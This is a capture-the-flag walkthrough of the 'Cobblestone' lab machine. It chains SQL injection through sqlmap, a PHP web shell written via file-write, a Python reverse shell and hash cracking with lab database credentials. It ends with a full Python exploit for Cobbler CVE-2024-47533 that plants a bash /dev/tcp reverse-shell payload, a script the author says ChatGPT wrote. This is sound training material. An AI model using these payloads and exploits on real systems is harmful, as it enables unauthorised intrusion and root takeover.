IP#

10.10.xx.xx

Recon#

1
$ nmap $target_ip  -sC -sV -Pn
2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 12:12 EDT
3
Nmap scan report for 10.10.11.81
4
Host is up (0.45s latency).
5
Not shown: 998 closed tcp ports (reset)
6
PORT   STATE SERVICE VERSION
7
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
8
| ssh-hostkey:
9
|   256 50:ef:5f:db:82:03:36:51:27:6c:6b:a6:fc:3f:5a:9f (ECDSA)
10
|_  256 e2:1d:f3:e9:6a:ce:fb:e0:13:9b:07:91:28:38:ec:5d (ED25519)
11
80/tcp open  http    Apache httpd 2.4.62
12
|_http-server-header: Apache/2.4.62 (Debian)
13
|_http-title: Did not follow redirect to http://cobblestone.htb/
14
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
15

16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
17
Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds

We got hostname

Host#

cobblestone.htb

Website Enumeartion#

Port 80#

check the Website : http://cobblestone.htb/

A Minecraft-inspired gaming hub welcomes us:

alt text

This writeup is password protected 🔒

The design seems strangely recognizable—three distinct gateways await:

Subdomain

alt text

when you click on these three images on home page which was running on port 80 it was redirecting to another subdomains

1
deploy.cobblestone.htb
2
cobblestone.htb/login.php
3
vote.cobblestone.htb

lets add in to /etc/hosts

since we already have cobblestone.htb so lets add rest

1
10.10.11.81 cobblestone.htb vote.cobblestone.htb deploy.cobblestone.htb

Subdomains Enumeration

vote.cobblestone.htb

deploy.cobblestone.htb

As we see in vote.cobblestone.htb it was redirecting to http://vote.cobblestone.htb/login.php soe we have login page in that we have register ! Lets register with some fake credits

alt text

After login on when you check vote.cobblestone.htb have some webpage having some voting

alt text

now lets go home page on cobblestone.htb lets click on those images for to confirm again.

when click on the second image it was still showing login page

lets try with registered credits

it saying User was not found lets try to register by clicking beside of login

alt text

we go register success

lets login after login we it was redirecting to cobblestone.htb/skins.php

Testing

Lets go to first url http://vote.cobblestone.htb/index.php there we see the beside of the vote we have suggest lets see there what it was

alt text

Ok ! Here we need to add some URL

lets try with our site pwncrafts.vercel.app

alt text

Ok ! Our status is false also assing some id on url http://vote.cobblestone.htb/details.php?id=12 The voting system is merely an illusion, yet it enables server communication through a URL parameter for

lets see on brup by adding the url

alt text

ok ! we have the reuqest now lets try to add another url like pwncrafts.google.com for to confirm the id was assing to each URL we added. and observe on brup

url added

Whether it’s approved or not doesn’t matter what counts is that we’ve set up a basic request–response link. The id parameter starts at 4 and increases sequentially:

brup confirm That id= is parameter.

alt text

NOTE
when we obsrve the unapproved url was deleting after some time so i just add the old url and it assigned teh new id as 4. also on textbox Suggestion #4 you see #4 is changing as of its id

A textbook IDOR emerges so An exploitable attack vector revealed.

WEB

SQLi

Entry Discovery

Inserting a lone a' into the suggestion POST request on repeter plunges us into an unforeseen error condition:

alt text

No response only a malfunctioning page.

Change to a'-- - and the server partially shows its cards: the HTML comes back, but the data payload is completely gone:

alt text

A subtle yet hopeful indication—potential grounds for SQL injection.

Sqlmap

Capture the suggest request for offline work:

save it as any name but in .req

Without any rate limiting present, we can send payloads without restriction. Crank up the flags and launch:

1
sqlmap -r mysuggest.req -p url \
2
    --dbs \
3
    --risk=3 --level=5 \
4
    --batch

SQLi confirmed:

alt text

Post Injection

sqlmap has already fingerprinted:

NOTE
“I found a UNION-based SQL injection on parameter url using 5 columns, and here’s the exact payload I used to prove it.”
Terminal window
1
Parameter: url (POST)
2
   Type: UNION query
3
   Title: Generic UNION query (NULL) - 5 columns
4
   Payload: url=-4680' UNION ALL SELECT NULL,CONCAT(0x7162786b71,0x73434e574973764e4a5842735261776b5858636569534f5666686d72715a517571706d4761637166,0x716a7a7071),NULL,NULL,NULL-- -

Minimal Proof-of-Concept:

1
url=' UNION ALL SELECT NULL,'Axura',NULL,NULL,NULL-- -

At this point, sqlmap can transition to pulling data or accessing the filesystem.

Enumeration

List of databases:

1
$ sqlmap -r mysuggest.req -p url \
2
    --dbs \
3
    --batch
4

5
available databases [2]:
6
[*] information_schema
7
[*] vote

we have table vote

1
$ sqlmap -r mysuggest.req -p url \
2
    -D vote --tables \
3
    --batch
4

5
Database: vote
6
[2 tables]
7
+-------+
8
| users |
9
| votes |
10
+-------+

we have users: lets see what columnts present in that users

1
$ sqlmap -r mysuggest.req -p url \
2
    -D vote -T users --columns
3

4
[02:08:43] [INFO] retrieved: id
5
[02:08:48] [INFO] retrieved: username
6
[02:09:01] [INFO] retrieved: firstname
7
[02:09:13] [INFO] retrieved: email
8
[02:13:00] [INFO] retrieved: lastname
9
[02:13:47] [INFO] retrieved: password

ok we have username & password ! Lets Dump credentials:

1
$ sqlmap -r mysuggest.req -p url \
2
    -D vote -T users \
3
    -C username,password \
4
    --dump --batch
5

6
Database: vote
7
Table: users
8
[2 entries]
9
+----------+--------------------------------------------------------------+
10
| username | password                                                     |
11
+----------+--------------------------------------------------------------+
12
| admin    | $2y$10$6XMWgf8RN6McVqmRyFIDb.6nNALRsA./u4HAF2GIBs3xgZXvZjv86 |
13
| pwncrafts| $2y$10$ZDqxFveA3d6eYI.0alpZauum/mbn3eCLLr5QFqNFtSebeOkhUnYRe |
14
+----------+--------------------------------------------------------------+

Heavy hashes though.

File Read / Write

After verifying a UNION-based injection, we can determine if a file exists on the target machine using MySQL’s LOAD_FILE() function—sqlmap conveniently offers built-in options (--file-read, --file-write) for this purpose.

lets read primitive:

1
$ sqlmap -r mysuggest.req -p url --batch \
2
       --file-read="/etc/passwd"
3

4
files saved to [1]:
5
[*] /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_etc_passwd (same file)
6

7

8
$ cat /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_etc_passwd
9
root:x:0:0:root:/root:/bin/bash
10
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
11
bin:x:2:2:bin:/bin:/usr/sbin/nologin
12
sys:x:3:3:sys:/dev:/usr/sbin/nologin
13
sync:x:4:65534:sync:/bin:/bin/sync
14
games:x:5:60:games:/usr/games:/usr/sbin/nologin
15
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
16
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
17
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
18
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
19
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
20
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
21
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
22
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
23
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
24
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
25
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
26
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
27
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
28
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
29
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
30
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
31
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
32
cobble:x:1000:1000:cobble,,,:/home/cobble:/bin/rbash
33
mysql:x:103:112:MySQL Server,,,:/nonexistent:/bin/false
34
tftp:x:104:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
35
_laurel:x:999:996::/var/log/laurel:/bin/false
36
john:x:1001:1001:,,,:/home/john:/bin/bash

we got users: john, cobble. lets Write primitive:

Demonstrated that we’re capable of writing files beyond the webroot:

1
$ echo '<?php @system($_REQUEST["x"]); echo "hello world" ?>' > shell.php
2

3

4
$ sqlmap -r mysuggest.req -p url  --batch \
5
       --file-write="shell.php" \
6
       --file-dest="/tmp/pwned"
7

8
files saved to [1]:
9
[*] /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_tmp_pwned (same file)
10

11

12
$ cat /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_tmp_pwned
13
<?php @system($_REQUEST["x"]); echo "hello world" ?>

After confirming the file is in the webroot, execute it to gain a reverse shell—complete control secured.

Should this be unintended for an insane-level machine?

RCE

Web Shell

Armed with a file write primitive, our goal changes—drop a payload in a spot Apache will gladly serve and run. A minimal PHP web shell becomes our weapon of choice.

The server signature indicates Debian with Apache 2.4.62 in operation:

alt text

Step one—retrieve Apache’s site configuration to chart the landscape:

1
/etc/apache2/sites-enabled/000-default.conf

Expose the file using the read primitive:

1
<VirtualHost *:80>
2
        RewriteEngine On
3
        RewriteCond %{HTTP_HOST} !^cobblestone.htb$
4
        RewriteRule /.* http://cobblestone.htb/ [R]
5
        ServerName 127.0.0.1
6
        ProxyPass "/cobbler_api" "http://127.0.0.1:25151/"
7
        ProxyPassReverse "/cobbler_api" "http://127.0.0.1:25151/"
8
</VirtualHost>
9

10
<VirtualHost *:80>
11
        ServerName cobblestone.htb
12

13
        ServerAdmin cobble@cobblestone.htb
14
        DocumentRoot /var/www/html
15

16
        <Directory /var/www/html>
17
                AAHatName cobblestone
18
        </Directory>
19

20
        ErrorLog ${APACHE_LOG_DIR}/error.log
21
        CustomLog ${APACHE_LOG_DIR}/access.log combined
22

23
        RewriteEngine On
24
        RewriteCond %{HTTP_HOST} !^cobblestone.htb$
25
        RewriteRule /.* http://cobblestone.htb/ [R]
26

27
        Alias /cobbler /srv/www/cobbler
28

29
        <Directory /srv/www/cobbler>
30
                Options Indexes FollowSymLinks
31
                AllowOverride None
32
                Require all granted
33
        </Directory>
34

35
</VirtualHost>
36

37
<VirtualHost *:80>
38
        ServerName deploy.cobblestone.htb
39

40
        ServerAdmin cobble@cobblestone.htb
41
        DocumentRoot /var/www/deploy
42

43
        RewriteEngine On
44
        RewriteCond %{HTTP_HOST} !^deploy.cobblestone.htb$
45
        RewriteRule /.* http://deploy.cobblestone.htb/ [R]
46
</VirtualHost>
47

48
<VirtualHost *:80>
49
        ServerName vote.cobblestone.htb
50

51
        ServerAdmin cobble@cobblestone.htb
52
        DocumentRoot /var/www/vote
53

54
        RewriteEngine On
55
        RewriteCond %{HTTP_HOST} !^vote.cobblestone.htb$
56
        RewriteRule /.* http://vote.cobblestone.htb/ [R]
57
</VirtualHost>

Test the minimal PHP command executor via http://cobblestone.htb/.index.php?x=id:

Reverse Shell

Nevertheless, the /var/www/html directory appears to be secured. We confirmed curl is available in the PATH (using which curl), but it cannot connect to our attacker IP—outbound internet access is blocked.

After further testing, I discovered that the /var/www/vote path is unrestricted, allowing us to upload a small malicious shell (with PHP file size also limited) onto the target:

1
sqlmap -r mysuggest.req -p url  --batch \
2
       --file-write="shell.php" \
3
       --file-dest="/var/www/vote/.index.php"

Through http://vote.cobblestone.htb/.index.php, trigger a reverse shell where Python is verified to be installed:

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.xx.xx",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

The line bites—www-data is now ours:

1
$ rlwrap nc -lnvp 4444
2
Connection from 10.129.xx.xx:49180
3
$ id
4
id
5
uid=33(www-data) gid=33(www-data) groups=33(www-data)
6
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
7
python3 -c 'import pty;pty.spawn("/bin/bash")'
8
www-data@cobblestone:/var/www/vote$ ls -R
9
ls -R
10
.:
11
composer.json db img login.php register.php vendor composer.lock
12
details.php index.php login_verify.php suggest.php webfonts CSS
13
favicon.ico js logout.php templates
14
./css:
15
all.min.css bootstrap.min.css stylesheet.css stylesheet.css.orig
16
./db:
17
connection.php
18
./img:
19
minecraft.jpg
20
./js:
21
bootstrap.bundle.min.js
22
firefly.js jquery.min.js
23
main.js
24
./templates:
25
...

Web root user www-data compromised.

USER

After gaining the web foothold, the next step is traditional post-exploitation—extract every valuable configuration file.

Database Compromise

Using the earlier web shell at /var/www/html (prior to obtaining a reverse shell), I ran a recursive directory listing (ls -R) to map the entire web root directory: /var/www/html

1
/var/www/html
2
├── composer.json
3
├── composer.lock
4
├── index.php
5
├── login.php
6
├── login_verify.php
7
├── logout.php
8
├── register.php
9
├── upload.php
10
├── suggest_skin.php
11
├── skins.php
12
├── skins_app_admin_server_info.php
13
├── download.php
14
├── preview_banner.php
15
├── user.php
16
├── db/
17
│   └── connection.php
18
├── css/
19
│   ├── all.min.css
20
│   ├── bootstrap.min.css
21
│   └── stylesheet.css
22
├── js/
23
│   ├── bootstrap.bundle.min.js
24
│   ├── firefly.js
25
│   ├── jquery.min.js
26
│   └── main.js
27
├── img/
28
│   ├── forums.png
29
│   ├── logo.png
30
│   ├── minecraft.jpg
31
│   ├── store.png
32
│   └── vote.png
33
├── skins/
34
│   ├── dog1234.png
35
│   ├── eldeathly.png
36
│   ├── niftysmith.png
37
│   ├── paulgg.png
38
│   ├── sword4000.png
39
│   └── preview_*.png
40
├── templates/                  # Twig views
41
│   ├── downloads.html.twig
42
│   ├── footer.html.twig
43
│   ├── header.html.twig
44
│   ├── suggest.html.twig
45
│   ├── suggestform.html.twig
46
│   ├── upload.html.twig
47
│   └── user.html.twig
48
├── vendor/
49
│   ├── autoload.php
50
│   ├── composer/               # Composer autoload metadata
51
│   ├── symfony/                # polyfills, contracts
52
│   └── twig/twig/              # Twig engine
53
└── webfonts/
54
    ├── fa-*.ttf
55
    └── fa-*.woff2

The dubious db folder holds a config file revealing the credentials for the cobblestone database:

1
// connection.php under /var/www/html/db
2
<?php
3

4
$dbserver = "localhost";
5
$username = "dbuser";
6
$password = "aichooDeeYanaekungei9rogi0eMuo2o";
7
$dbname = "cobblestone";
8

9
$conn = new mysqli($dbserver, $username, $password, $dbname);
10

11
// Check connection
12
if ($conn->connect_errno > 0) {
13
die("Connection failed: " . $conn->connect_error);
14
}
15
?>

Located within /var/www/vote, the separate db/connection.php holds credentials for a different database named vote:

1
// connection.php under /var/www/vote/db
2
<?php
3

4
$dbserver = "localhost";
5
$username = "voteuser";
6
$password = "thaixu6eih0Iicho]irahvoh6aigh>ie";
7
$dbname = "vote";
8

9
$conn = new mysqli($dbserver, $username, $password, $dbname);
10

11
// Check connection
12
if ($conn->connect_errno > 0) {
13
 die("Connection failed: " . $conn->connect_error);
14
}
15
?>

This was revealed earlier in the SQLi stage, yet remains useful for verifying password reuse.

Next, we establish a local connection to the uncharted cobblestone server through our reverse shell:

1
mysql -u dbuser -p'aichooDeeYanaekungei9rogi0eMuo2o' -h localhost cobblestone

1
MariaDB [cobblestone]> show databases;
2
show databases;
3
+--------------------+
4
| Database           |
5
+--------------------+
6
| cobblestone        |
7
| information_schema |
8
+--------------------+
9
2 rows in set (0.001 sec)
10

11
MariaDB [cobblestone]> use cobblestone;
12
use cobblestone;
13
Database changed
14

15
MariaDB [cobblestone]> show tables;
16
show tables;
17
+-----------------------+
18
| Tables_in_cobblestone |
19
+-----------------------+
20
| skins                 |
21
| suggestions           |
22
| users                 |
23
+-----------------------+
24
3 rows in set (0.001 sec)
25

26
MariaDB [cobblestone]> select * from users;
27
select * from users;
28
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
29
| id | Username | FirstName | LastName | Email                  | Role  | Password                                                         | register_ip |
30
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
31
|  1 | admin    | admin     | admin    | admin@cobblestone.htb  | admin | f4166d263f25a862fa1b77116693253c24d18a36f5ac597d8a01b10a25c560d1 | *           |
32
|  2 | cobble   | cobble    | stone    | cobble@cobblestone.htb | admin | 20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d | *           |
33
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
34
2 rows in set (0.001 sec)

The users table contained two entries—admin and cobble—stored as unsalted SHA-256 hashes:

1
$ hashcat --identify '20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d'
2
The following 8 hash-modes match the structure of your input hash:
3

4
      # | Name                                                       | Category
5
  ======+============================================================+======================================
6
   1400 | SHA2-256                                                   | Raw Hash
7
  17400 | SHA3-256                                                   | Raw Hash
8
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian           | Raw Hash
9
   6900 | GOST R 34.11-94                                            | Raw Hash
10
  17800 | Keccak-256                                                 | Raw Hash
11
   1470 | sha256(utf16le($pass))                                     | Raw Hash
12
  20800 | sha256(md5($pass))                                         | Raw Hash salted and/or iterated
13
  21400 | sha256(sha256_bin($pass))                                  | Raw Hash salted and/or iterated

hashcat (mode 1400) successfully decrypted cobble’s hash:

1
$ echo "f4166d263f25a862fa1b77116693253c24d18a36f5ac597d8a01b10a25c560d1" > hashes.txt
2
$ echo "20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d" >> hashes.txt
3

4
$ hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt --force
5
20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d:iluvdannymorethanyouknow
6
Session..........: hashcat
7
Status...........: Cracked
8
Hash.Mode........: 1400 (SHA2-256)
9
Hash.Target......: 20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987...0a8f4d

before /etc/passwd confirmed cobble as a local user:

1
$ ls /home
2
chroot_jail  cobble  john

lets login with cracked credentials into SSH:

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ ssh cobble@cobblestone.htb
3
The authenticity of host 'cobblestone.htb (10.10.11.81)' can't be established.
4
ED25519 key fingerprint is SHA256:c5Fpg/cgHQO2EmwqsW3VtYIVXXMz7nz8dwjibC8n0gw.
5
This key is not known by any other names.
6
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7
Warning: Permanently added 'cobblestone.htb' (ED25519) to the list of known hosts.
8
cobble@cobblestone.htb's password:
9
Linux cobblestone 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
10

11
The programs included with the Debian GNU/Linux system are free software;
12
the exact distribution terms for each program are described in the
13
individual files in /usr/share/doc/*/copyright.
14

15
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
16
permitted by applicable law.
17
cobble@cobblestone:~$

alt text

The session opens within a restricted bash (rbash) environment, yet the user flag is readily available.

ROOT

Rbash

Rbash, or restricted bash, is basically a limited version of bash. No changing directories with cd, no altering the PATH variable, and no running binaries via absolute paths unless they’re included in $PATH. Redirecting output? Not possible. Trying set +r? Won’t work.

That’s why our initial web shell is confined to /var/www/html. However, we’ve just discovered that /var/www/vote is an allowed exception.

Our collection of permitted binaries is minimal:

1
cobble@cobblestone:~$ ls /bin -l
2
total 1964
3
-rwxr-xr-x 1 root root   44016 Oct  1  2024 cat
4
-rwxr-xr-x 1 root root  203152 Oct  1  2024 grep
5
-rwxr-xr-x 1 root root  151344 Oct  1  2024 ls
6
-rwxr-xr-x 1 root root  146360 Oct  1  2024 ps
7
-rwxr-xr-x 1 root root 1265648 Oct  1  2024 rbash
8
-rwxr-xr-x 1 root root  193680 Oct  1  2024 ss

However, ps and ss provide sufficient tools to begin probing the system’s vital processes.

Local Enum

Perform some basic system enumeration:

1
cobble@cobblestone:~$ ps -ef
2
UID          PID    PPID  C STIME TTY          TIME CMD
3
...
4
root        1037       1  0 07:21 ?        00:00:00 /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
5
root        1166       1  0 07:21 ?        00:00:07 /usr/bin/python3 /usr/local/bin/cobblerd -F
6
root        1168       1  0 07:21 ?        00:00:03 php-fpm: master process (/etc/php/8.2/fpm/php-fpm.conf)
7
root        1187       1  0 07:21 ?        00:00:00 /sbin/agetty -o -p -- \u --noclear - linux
8
root        1196       1  0 07:21 ?        00:00:00 /usr/sbin/in.tftpd --listen --user tftp --address :69 --secure /srv/tftp
9
www-data    1238    1168  0 07:21 ?        00:00:00 php-fpm: pool www
10
www-data    1240    1168  0 07:21 ?        00:00:00 php-fpm: pool www
11
mysql       1287       1  0 07:21 ?        00:00:09 /usr/sbin/mariadbd
12
root        1288       1  0 07:21 ?        00:00:03 /usr/sbin/apache2 -k start
13
www-data   97625    1288  0 13:35 ?        00:00:00 /usr/sbin/apache2 -k start
14
root       98060       2  0 13:38 ?        00:00:00 [kworker/u4:0-events_unbound]
15
www-data  104468   97625  0 14:02 ?        00:00:00 sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.12.11",4444));os.dup2
16
www-data  104470  104469  0 14:02 ?        00:00:00 sh
17
root      104556       2  0 14:03 ?        00:00:01 [kworker/1:2-events]
18
root      105772       2  0 14:08 ?        00:00:00 [kworker/u4:3-ext4-rsv-conversion]
19
root      108690       2  0 14:19 ?        00:00:00 [kworker/0:3-events]
20
www-data  108801    1288  0 14:19 ?        00:00:00 /usr/sbin/apache2 -k start
21
www-data  109302    1288  0 14:20 ?        00:00:00 /usr/sbin/apache2 -k start
22
root      109303       1  0 14:20 ?        00:00:00 sshd: cobble [priv]
23
cobble    109394       1  0 14:21 ?        00:00:00 /lib/systemd/systemd --user
24
cobble    109395  109394  0 14:21 ?        00:00:00 (sd-pam)
25
cobble    109414  109303  0 14:21 ?        00:00:00 sshd: cobble@pts/1
26
cobble    109489  109414  0 14:21 ?        00:00:00 -rbash
27
root      109804       2  0 14:23 ?        00:00:00 [kworker/1:3-events]
28
www-data  111008    1288  0 14:27 ?        00:00:00 /usr/sbin/apache2 -k start
29
...

1
cobble@cobblestone:~$ ss -lntp
2
State                 Recv-Q                Send-Q                               Local Address:Port                                 Peer Address:Port                Process
3
LISTEN                0                     5                                        127.0.0.1:25151                                     0.0.0.0:*
4
LISTEN                0                     511                                        0.0.0.0:80                                        0.0.0.0:*
5
LISTEN                0                     128                                        0.0.0.0:22                                        0.0.0.0:*
6
LISTEN                0                     80                                       127.0.0.1:3306                                      0.0.0.0:*
7
LISTEN                0                     128                                           [::]:22                                           [::]:*
8

9
cobble@cobblestone:~$ ss -lnup
10
State                 Recv-Q                Send-Q                               Local Address:Port                                 Peer Address:Port                Process
11
UNCONN                0                     0                                          0.0.0.0:68                                        0.0.0.0:*
12
UNCONN                0                     0                                          0.0.0.0:69                                        0.0.0.0:*
13
UNCONN                0                     0                                             [::]:69                                           [::]:*

Observations:

The process /usr/local/bin/cobblerd -F is running as root and listening exclusively on 127.0.0.1:25151. Apache, PHP-FPM, and MariaDB are all active, with MariaDB bound to localhost. A TFTP server is running on UDP port 69 at /srv/tftp. This setup represents a typical Cobbler stack—allowing exploitation of Cobbler’s XML-RPC interface from localhost to read arbitrary files with root privileges. A provisioning daemon operating as root and exposing a local API effectively functions as an on-demand privilege escalation vector.

Cobbler

Understanding Cobbler’s operation might call for basic familiarity with Linux kernel internals. However, an in-depth exploration—such as the kernel boot process involving initrd (previously initramfs) or filesystem management—is outside this write-up’s scope. Moreover, such detail isn’t required to exploit this challenge. For comprehensive insights, refer to the official Linux Kernel documentation.

Fundamental Concepts

Cobbler

TIP

Cobbler is a Linux provisioning and PXE (Preboot Execution Environment) server designed to automate OS installations. It manages three primary object types:

Distro: Metadata for an OS build, primarily including paths to the kernel and initrd files on the Cobbler host (e.g., /boot/vmlinuz-6.1.0-37-amd64, /boot/initrd.img-6.1.0-37-amd64).

Profile: An installation blueprint that references one distro and includes configuration details such as kickstart templates.

System: A specific machine configuration pointing to a profile, with host-specific adjustments like MAC/IP addresses and templated files.

The Cobbler daemon (cobblerd) operates as root and exposes a management API bound to 127.0.0.1:25151.

Provisioning

Provisioning is the process of setting up systems or users with the necessary resources and services. This includes creating, modifying, or deleting user accounts and profiles, managing permissions, and configuring IT infrastructure. It ensures users have appropriate access to perform their roles efficiently.

TFTP

TFTP (Trivial File Transfer Protocol, UDP port 69) facilitates PXE boot by delivering bootloaders, kernels, and initrd images to clients.

From the process list:

1
in.tftpd --secure /srv/tftp

This indicates the server delivers files from /srv/tftp. The --secure flag restricts access to that directory, enforcing read-only permissions—a vital part of PXE booting but not directly exploitable for privilege escalation here unless the directory is writable.

XML-RPC

Cobbler acts as an orchestrator for PXE and OS provisioning. It maintains an internal representation of expected resources—distros, profiles, and systems—and materializes these into files and directories served via TFTP/HTTP. The XML-RPC API serves as a remote interface to this model, accessible locally at 127.0.0.1:25151, used by both the Cobbler CLI and web interface.

Through this API, an authenticated user can create, modify, and save distros, profiles, and systems, then trigger a sync operation.

Sync

The sync function is Cobbler’s “deploy changes” command. When invoked via srv.sync(token):

Cobbler reads its internal database/state for all distros, profiles, and systems.
It validates that referenced kernel/initrd paths exist on disk.
It generates or updates files within managed directories, typically:

TFTP tree (e.g., /srv/tftp)

Web tree (e.g., /srv/www/cobbler or /var/www/cobbler)
Internal template/cache directories under /var/lib/cobbler/…
It processes per-system template_files, copying or rendering them into system-specific areas for serving or querying.

Since cobblerd runs with root privileges, all file operations happen with full system rights—this is a critical factor.

Notably, a System object’s template_files can be defined as:

1
{"<source_path_on_host>": "<virtual_dest_path>"}

<source_path_on_host> can be any path on the Cobbler server (e.g., /etc/shadow).
<virtual_dest_path> is a logical identifier (e.g., /leak) that Cobbler uses as a reference.

When sync runs, Cobbler opens the source file as root, reads its contents, and stores it in the system’s template repository under the virtual destination.

Later, the XML-RPC method

CVE-2024-47533

EXP

lets ask chatgpt to write exploit script:

1
import xmlrpc.client
2
import uuid
3

4
TARGET = "http://127.0.0.1:25151"
5
LHOST, LPORT = "10.10.xx.xx", "4444"
6

7
# Expression-only Cheetah payload that won't break parsing:
8
payload = f"""#set $null = __import__('os').system('bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"')
9
# Kickstart minimal skeleton (keeps Cobbler happy)
10
lang en_US
11
keyboard us
12
network --bootproto=dhcp
13
rootpw  --plaintext cobbler
14
timezone UTC
15
bootloader --location=mbr
16
clearpart --all --initlabel
17
autopart
18
reboot
19
"""
20

21
random_suffix = str(uuid.uuid4())[:4]
22

23
s = xmlrpc.client.ServerProxy(TARGET)
24
t = s.login("", -1)  # CVE-2024-47533
25

26
# (Re)write the malicious template (avoid #python/#end python)
27
s.write_autoinstall_template("pwn.ks", payload, t)
28

29
did = s.new_distro(t)
30
s.modify_distro(did, "name", f"pwn_distro{random_suffix}", t)
31
s.modify_distro(did, "arch", "x86_64", t)
32
s.modify_distro(did, "breed", "redhat", t)
33
s.modify_distro(did, "kernel", "vmlinuz", t)
34
s.modify_distro(did, "initrd", "initrd.img", t)
35
s.save_distro(did, t)
36

37
# Create/adjust the profile, link distro, set our template
38
try:
39
    pid = s.new_profile(t)
40
    s.modify_profile(pid, "name", "pwnprof", t)
41
except xmlrpc.client.Fault:
42
    pid = s.get_profile("pwnprof", t)
43

44
s.modify_profile(pid, "distro", f"pwn_distro{random_suffix}", t)
45
s.modify_profile(pid, "autoinstall", "pwn.ks", t)
46
s.modify_profile(pid, "kickstart",   "pwn.ks", t)
47
s.save_profile(pid, t)
48

49
# Render (no token arg)
50
print(s.generate_profile_autoinstall("pwnprof"))

alt text

1
root@cobblestone:/root# cat root.txt
2
cat root.txt
3
5760b52bf3b4289cf312xxxxxxxxx
4
root@cobblestone:/root#